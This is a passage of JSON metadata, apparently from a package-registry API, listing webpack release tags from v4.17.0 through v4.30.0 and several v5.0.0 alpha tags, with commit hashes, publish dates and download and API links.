e.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G